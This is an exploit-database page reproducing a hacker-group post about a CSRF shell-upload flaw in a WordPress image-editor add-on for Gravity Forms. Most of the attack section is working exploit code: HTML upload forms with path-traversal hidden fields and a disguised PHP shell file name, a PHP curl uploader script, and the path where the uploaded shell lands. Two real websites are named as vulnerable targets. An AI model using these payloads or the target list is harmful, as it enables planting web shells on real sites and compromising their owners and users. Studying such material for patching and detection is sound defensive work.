Advertisement






WordPress Aviary Image Editor Add-On For Gravity Forms Plugins 3.0 Beta R7 CSRF Shell Upload Vulnera

CVE Category Price Severity
CWE-352 Not specified Critical
Author Risk Exploitation Type Date
Exploit Alert Team Critical Remote 2020-03-23
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.0458 0.67124

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020030128

Below is a copy:

WordPress Aviary Image Editor Add-On For Gravity Forms Plugins 3.0 Beta R7 CSRF Shell Upload Vulnerability
####################################################################

# Exploit Title : WordPress Aviary Image Editor Add-On For Gravity Forms Plugins 3.0 Beta R7 CSRF Shell Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 22/03/2020
# Vendor Homepage : wordpress.org
# Sofware Link : wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms/
# Software Affected Version : 3.0 (Beta r7) and other versions
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : 
CWE-352 [ Cross-Site Request Forgery (CSRF) ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Impact :
***********
The Aviary Image Editor Add-on For Gravity Forms plugin for WordPress 
is prone to an arbitrary-file-upload vulnerability.
An attacker may leverage this issue to upload arbitrary files to the affected 
computer; this can result in arbitrary code execution within the context of the 
vulnerable application.
Aviary Image Editor Add-on For Gravity Forms 3.0 (beta) is vulnerable; 
other versions may also be affected.

CWE-352: Cross-Site Request Forgery (CSRF)
******************************************
The web application does not, or can not, sufficiently verify whether a well-formed, 
valid, consistent request was intentionally provided by the user who submitted the request.

When a web server is designed to receive a request from a client without any mechanism 
for verifying that it was intentionally sent, then it might be possible for an attacker to trick a 
client into making an unintentional request to the web server which will be treated as an 
authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and 
can result in exposure of data or unintended code execution.

CWE-264: Permissions, Privileges, and Access Controls
**************************************************
Weaknesses in this category are related to the management of permissions, privileges, and 
other security features that are used to perform access control.

CWE-434: Unrestricted Upload of File with Dangerous Type
****************************************************
The software allows the attacker to upload or transfer files of dangerous types that can 
be automatically processed within the product's environment.

####################################################################

# Arbitrary File Upload / Unauthorized File Insert / Shell Upload Exploit :
***************************************************************
CSRF Cross Site Request Forgery Exploiter 1 => 
******************************************
<form method="POST" action="VULNERABLEWEBSITEHERE/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

# CSRF Cross Site Request Forgery Exploit 2 => 
****************************************
<title>WordPress Aviary Image Editor Add-On For Gravity Forms Plugins Exploiter</title>

<form action="http://[VULNERABLEWEBSITE]/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php" method="post" enctype="multipart/form-data">

<body background=" ">

<input type="file" name="file" id="file"><br>
<input name="form_id" value="../../../" type=hidden">
<input name="name" value="kingskrupellos.php.pjpg" type=''hidden">
<input name="gform_unique_id" value="../../" type="hidden">
<input name="field_id" value="" type="hidden">
<input type="submit" name="gform_submit" value="submit">

# CSRF Cross Site Request Forgery Exploit 3=> 
****************************************
<html>
<body>
<form action="http://www.[VULNERABLESITE].gov/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="WordPress Aviary Image Editor Add-On For Gravity Forms Plugins Exploiter Cyberizm" />
<input type="hidden" name="album_desc" value="WordPress Aviary Image Editor Add-On For Gravity Forms Plugins Exploiter Cyberizm" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

</form>

PHP Exploiter Code : 
*********************
<?php
$uploadfile="kingskrupellos.php.pjpg"; /// KingSkrupellos ! Cyberizm Digital Security Army ^_^
$ch = curl_init("http://127.0.0.1/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('file'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

# Vulnerability Error : 
********************
{"status":"error","message":"Unsupported File Type. Supported files","code":null}

{"status":"error","message":"Unsupported File Type. Supported files"}

Directory File Path :
******************
/wp-content/uploads/gform_aviary/_[SHELL].php.pjpg

####################################################################

# Example Vulnerable Sites :
************************
[+] solicitud.tenmas.es/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php

[+] rbmlumber.com/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.